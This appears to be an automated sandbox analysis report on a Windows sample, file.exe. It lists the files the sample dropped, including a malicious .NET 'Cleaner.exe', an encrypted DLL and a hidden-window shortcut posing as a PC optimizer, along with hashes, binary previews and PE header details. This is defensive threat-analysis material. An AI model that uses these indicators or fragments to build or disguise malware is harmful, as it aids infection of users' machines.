                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719930" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERBD48.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\System32\WerFault.exe
                                                      File Type:Mini DuMP crash report, 16 streams, Tue Oct 4 00:21:28 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):518260
                                                      Entropy (8bit):3.536415012678232
                                                      Encrypted:false
                                                      SSDEEP:6144:C79mDgOYKYTPZJkSl8ALgcxPi8v7u4dl/epTX/:rDKTP7kqti8v
                                                      MD5:A8D486B3C0D7F08CE1D59B7BF07162FD
                                                      SHA1:DEB96F66C9FC6BA0BDD429F3EF5F3DA4953A4B52
                                                      SHA-256:02708A2BD300AB623BA3B39742530B60A6BFEDF3623926F7EAB3ECC386E8D43E
                                                      SHA-512:F9AD421DC2CDD3834FE0DFC5E3E37AA440A87C6959F8932AB7093B88552EF96A26168EB698CD3E1532F8481D632B9A91A8FE2889AA335367FE043CCAA62D5036
                                                      Malicious:false
                                                      Preview:MDMP....... ........|;c........................d...........<...((......@...d(.......P..z...........l.......8...........T............?..|............C...........E...................................................................U...........B......(F......Lw.................1....T.......L...U|;c.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERD8A1.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\System32\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):6772
                                                      Entropy (8bit):3.7142131549542157
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNiS9JJiYZCmSnCprt89bVnpKfzHm:RrlsNiIniY7StVnkf6
                                                      MD5:ED0D843FADBAB78AB55E0ECE0B5D9614
                                                      SHA1:C7F60EE9EED14DACDCF7E697899548C44889120F
                                                      SHA-256:329B85AD7A560010B770AA544DB16AC9EF2DD2BC381E5AF0A1301737110E1C12
                                                      SHA-512:58A37E60EC56630FA089ED38D4975CD2695C53E068B0DFA8B661CB5433A99B2A7596DD43202082560316730A763A3820D4F6A8BF30486AAE1C3A741013B5270B
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.3.8.0.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERDB03.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\System32\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4755
                                                      Entropy (8bit):4.427733075060363
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsmJgtBI9AuWgc8sqYj28fm8M4JcuCFdTf5yq8vcuOcAyTd:uITf8OPgrsqY3JxG5WxVAyTd
                                                      MD5:7616D4F07C00AD36C2D6F5EA46F6D5F9
                                                      SHA1:8209B30A09517A29B1B0FD2677FED84C44E72C40
                                                      SHA-256:25B5B7F6190E7F8496E39C1BBAF61977AFFAB062A7018453446C1EF96B56C826
                                                      SHA-512:EF6867939445375C520C0B2573B3E594D2C50653FA509E1A7B2BFECC9C595FB5F6146A707D039FACB14201BECB9374167C508708257B3EA1036AC9B3544578B7
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719932" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\ping[1].htm

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:ASCII text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):17
                                                      Entropy (8bit):3.1751231351134614
                                                      Encrypted:false
                                                      SSDEEP:3:nCmxEl:Cmc
                                                      MD5:064DB2A4C3D31A4DC6AA2538F3FE7377
                                                      SHA1:8F877AE1873C88076D854425221E352CA4178DFA
                                                      SHA-256:0A3EC2C4FC062D561F0DC989C6699E06FFF850BBDA7923F14F26135EF42107C0
                                                      SHA-512:CA94BC1338FC283C3E5C427065C29BA32C5A12170782E18AA0292722826C5CB4C3B29A5134464FFEB67A77CD85D8E15715C17A049B7AD4E2C890E97385751BEE
                                                      Malicious:false
                                                      Preview:UwUoooIIrwgh24uuU

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\fuckingdllENCR[1].dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):94224
                                                      Entropy (8bit):7.998072640845361
                                                      Encrypted:true
                                                      SSDEEP:1536:NsbI9W6dHdtnEXOxZpPzIUcETzNtXofjmgGTeJduLLt+YBPoJTMRmNXg30:KWW6TZVz9PNtXo8M5OR0
                                                      MD5:418619EA97671304AF80EC60F5A50B62
                                                      SHA1:F11DCD709BDE2FC86EBBCCD66E1CE68A8A3F9CB6
                                                      SHA-256:EB7ECE66C14849064F462DF4987D6D59073D812C44D81568429614581106E0F4
                                                      SHA-512:F2E1AE47B5B0A5D3DD22DD6339E15FEE3D7F04EF03917AE2A7686E73E9F06FB95C8008038C018939BB9925F395D765C9690BF7874DC5E90BC2F77C1E730D3A00
                                                      Malicious:false
                                                      Preview:...mi...};...F".).T..'K;....O.Y0:.....3j.\.Ij.2R.P....C...q.|.2.....iR2W.F.C=MU......H6...A.....@..O.c...M.x8...L..- ..b..|.C...Z}.w...l.a.aT...br,...6w#.j.P.li.=......o.......S.{..R........5....#;....-....b+..G(.>..Q.....iN{.+y...ZC.z3sE...T..2.J...3.9U.4&..P......."wI.....@....x%>..D..'z.^....^(.....NC.[[k..........V]G..)e.....`.......K/L.Ul..F.."..8$.Ad....:i.g..0.d...[...T"l.U.M.=.0...,..,.ku.W,.....7`Q.Fi=w...u..:..Q-.R.}0...L.....n...t.nv.....z....e..I.C.....9.V.~1+[]..7...xQ........$.L..o.eQ./.b..Z......p].;i*)...#.b...%1........@...G..[......./.c.Z......G.:..n..E.i.O..o.U.B.Px....1{,a.....#k.dj..L4...}.d<......Iyy.J..f.W..,^vV.Ao.K."+OX8!F...YP...u.-..Bik.[.u...&Wt..P...m....^ ..k~.....l..o.zMV.!s..h...{.n2;z...K..?S..-...eW...c.....-V.bg..9.I..g.x.g...}.'.5..(*P...J#..:.IS..D}.v......jK9.LQF...oOhV...).h.v^-..F...<.....Vh.1....!...!...BYc..C?..D2.....2.K(..6....B....D..ay..=|....'....[1.~.YB:./...A`...=..F..K...........

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\ping[1].htm

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\library[1].htm

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:modified
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6M6D1PMD\soft[1]

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3947920
                                                      Entropy (8bit):7.275018147968825
                                                      Encrypted:false
                                                      SSDEEP:49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
                                                      MD5:04514BD4962F7D60679434E0EBE49184
                                                      SHA1:1493A5447EB8156A7D7AECFF60EE8BFBA2209526
                                                      SHA-256:C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                                                      SHA-512:A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\dll[1]

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):242176
                                                      Entropy (8bit):6.47050397947197
                                                      Encrypted:false
                                                      SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                      MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                      SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                      SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                      SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\library[1].htm

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\VAHFWDJC\ping[1].htm

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:very short file (no magic)
                                                      Category:dropped
                                                      Size (bytes):1
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:3:V:V
                                                      MD5:CFCD208495D565EF66E7DFF9F98764DA
                                                      SHA1:B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
                                                      SHA-256:5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
                                                      SHA-512:31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
                                                      Malicious:false
                                                      Preview:0

                                                      C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Bunifu_UI_v1.5.3.dll

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):242176
                                                      Entropy (8bit):6.47050397947197
                                                      Encrypted:false
                                                      SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                      MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                      SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                      SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                      SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...

                                                      C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):3947920
                                                      Entropy (8bit):7.275018147968825
                                                      Encrypted:false
                                                      SSDEEP:49152:+/PD/DL/D9CuZrr2h60qPPB+lJJkF9IC966eB+lJJkF9IC966eB+lJJkF9IC966h:+3D///UUrP43m8C/3m8C/3m8C5
                                                      MD5:04514BD4962F7D60679434E0EBE49184
                                                      SHA1:1493A5447EB8156A7D7AECFF60EE8BFBA2209526
                                                      SHA-256:C394B068AA87264419F60838A8812B750E67CF93F2494C62B9078C3708072568
                                                      SHA-512:A71C7ED5DFDDA22F095DC99B16E8342A42E3361BE16E0241DBF8983DD0D5F6E90EB0299AAC1815CF78AD3A9F15FA89B42B720B7F818EE5F502300F102EF4C93E
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................"...0.................. ... ....@.. .......................`............`.................................T...O.... ..2............(<......@......8................................................ ............... ..H............text........ ...................... ..`.rsrc...2.... ......................@..@.reloc.......@......................@..B........................H.......h...@E......T........;............................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.

                                                      C:\Users\user\Desktop\Cleaner.lnk

                                                      Download File
                                                      Process:C:\Users\user\Desktop\file.exe
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has Relative path, Icon number=0, Archive, ctime=Mon Oct 3 23:20:31 2022, mtime=Mon Oct 3 23:20:31 2022, atime=Mon Oct 3 23:20:31 2022, length=3947920, window=hide
                                                      Category:dropped
                                                      Size (bytes):2109
                                                      Entropy (8bit):3.8983736018000514
                                                      Encrypted:false
                                                      SSDEEP:24:8FLGLN5EkRcgKYgSActP4595cbucpZtP4MLucTXZw7aB6m:8FLE5EkRoxctP4z5wuCZtP4OuGB6
                                                      MD5:CBB855B2BFBF2B1203C30C22D379CA73
                                                      SHA1:3AAF30AE8E25D639958C51568A415FC9D97F8A05
                                                      SHA-256:BFF0C181BA3B1E14A0F8BAD3931E9A8944CFD99A9C55B4020242C0FC926DE67A
                                                      SHA-512:C3FD17AEEF3D4F327B4FF73BEF98C61CE2BCBDDB34A01275AC4115C4EDE1F9AE1C94BB98D63FEE9ED9BB6E1E5546DC0AD87F154F5F79CE1AF3A9EB5662F9AE9F
                                                      Malicious:false
                                                      Preview:L..................F.@.. .....,.....QG/.....QG/......=<..................... .:..DG..Yr?.D..U..k0.&...&......7...#-..q.......... ........t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..DUJ......Y.....................P/.A.p.p.D.a.t.a...B.P.1......Uw...Local.<.......N..DUJ......Y....................)...L.o.c.a.l.....N.1.....DU....Temp..:.......N..DU.......Y........................T.e.m.p.....b.1.....DU....DU2KVB~1..J......DU..DU......U.........................d.u.2.k.V.B.q.i.T.x.f.v.....b.2..=<.DU.. .Cleaner.exe.H......DU..DU.............................@$.C.l.e.a.n.e.r...e.x.e.......m...............-.......l............(.6.....C:\Users\user\AppData\Local\Temp\du2kVBqiTxfv\Cleaner.exe....O.p.t.i.m.i.z.e. .y.o.u.r. .P.C.......\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.d.u.2.k.V.B.q.i.T.x.f.v.\.C.l.e.a.n.e.r...e.x.e.=.C.:.\.U.s.e.r.s.\.F.R.O.N.T.D.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.d.u.2.k.V.B.q.i.T.x.f.v.\.C.l.e.a.n.e.r...e.x.e.........%SystemDr

                                                      C:\Windows\appcompat\Programs\Amcache.hve

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:MS Windows registry file, NT/2000 or above
                                                      Category:dropped
                                                      Size (bytes):1572864
                                                      Entropy (8bit):4.280749130268631
                                                      Encrypted:false
                                                      SSDEEP:12288:bFqWA/RHQnfSq7eBU+xfHc0z4Z+b8b6rAJEkg1bPcTkcNBr9Hl:JbA/RHQnfSq7eBh8J+B
                                                      MD5:C8E53EF29286013E1F787446A20409CF
                                                      SHA1:CB66B1D1239DD305474C3567D13C0CB1786E96A1
                                                      SHA-256:8832E58C77EEC07A3763344629F01D8DD39CB617FADD951C65636212280FEC87
                                                      SHA-512:7F75BEACB684F371D4D20BE039D5D865515D739A600B0648D53ABF545249E9334CE02E01D07F9C59EFC9A0A90875EE24A7C7FC8B95E1AAB2A84FA425A3A68643
                                                      Malicious:false
                                                      Preview:regfe...e...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.W..................................................................................................................................................................................................................................................................................................................................................p..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.469320228864725
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:file.exe
                                                      File size:238080
                                                      MD5:a3b774ed5023f56970eea0668ae65703
                                                      SHA1:3aebfec7980d1db1edbeccbb29044ea677be304b
                                                      SHA256:f4f6bcce8531ffa055776e57b0f650b7f87049808e3b29d65fab79ec841ed81c
                                                      SHA512:98a9ec33206f8074104b2ecb19026cdbbe1a313e8f2be6ab088611c9c2dda1b7aaaf10a610376acbc9c5448076becc4685ef364d78dfbbb2eabfb3ddcf0117f6
                                                      SSDEEP:6144:iV8tR1u52up3sfkVXJYS1Ne/1z0BvEQTEOMEd:iV8trKM87YS1Ne9zY8MEtEd
                                                      TLSH:9034F1723DA08432DC5F74728CB29A453A7FB84222B5594673B81A6DAF337C16E343D6
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}...............N1......N'.................D....N ......N0......N5.....Rich............PE..L.....8a...........................

                                                      File Icon

                                                      Icon Hash:3370686868686829

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x404bf7
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x613897B6 [Wed Sep 8 11:00:06 2021 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:2d5ec24fb9d2ee4cf8208f9e16125d4f

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007F836CB9336Bh
                                                      jmp 00007F836CB8FEFDh
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      mov ecx, dword ptr [esp+04h]
                                                      test ecx, 00000003h
                                                      je 00007F836CB900A6h
                                                      mov al, byte ptr [ecx]
                                                      add ecx, 01h
                                                      test al, al
                                                      je 00007F836CB900D0h
                                                      test ecx, 00000003h
                                                      jne 00007F836CB90071h
                                                      add eax, 00000000h
                                                      lea esp, dword ptr [esp+00000000h]
                                                      lea esp, dword ptr [esp+00000000h]
                                                      mov eax, dword ptr [ecx]
                                                      mov edx, 7EFEFEFFh
                                                      add edx, eax
                                                      xor eax, FFFFFFFFh
                                                      xor eax, edx
                                                      add ecx, 04h
                                                      test eax, 81010100h
                                                      je 00007F836CB9006Ah
                                                      mov eax, dword ptr [ecx-04h]
                                                      test al, al
                                                      je 00007F836CB900B4h
                                                      test ah, ah
                                                      je 00007F836CB900A6h
                                                      test eax, 00FF0000h
                                                      je 00007F836CB90095h
                                                      test eax, FF000000h
                                                      je 00007F836CB90084h
                                                      jmp 00007F836CB9004Fh
                                                      lea eax, dword ptr [ecx-01h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      lea eax, dword ptr [ecx-02h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      lea eax, dword ptr [ecx-03h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      lea eax, dword ptr [ecx-04h]
                                                      mov ecx, dword ptr [esp+04h]
                                                      sub eax, ecx
                                                      ret
                                                      cmp ecx, dword ptr [00435ADCh]
                                                      jne 00007F836CB90084h
                                                      rep ret
                                                      jmp 00007F836CB93353h
                                                      push eax
                                                      push dword ptr fs:[00000000h]
                                                      lea eax, dword ptr [esp+0Ch]
                                                      sub esp, dword ptr [esp+0Ch]
                                                      push ebx
                                                      push esi
                                                      push edi
                                                      mov dword ptr [eax], ebp

                                                      Rich Headers

                                                      Programming Language:
                                                      • [ASM] VS2008 build 21022
                                                      • [ C ] VS2008 build 21022
                                                      • [IMP] VS2005 build 50727
                                                      • [C++] VS2008 build 21022
                                                      • [RES] VS2008 build 21022
                                                      • [LNK] VS2008 build 21022

                                                      Data Directories

                                                      NameVirtual AddressVirtual Size Is in Section
                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0xe0fc0x50.text
                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x1910000x4bf8.rsrc
                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x12100x1c.text
                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                      IMAGE_DIRECTORY_ENTRY_TLS0x2c780x18.text
                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2c300x40.text
                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
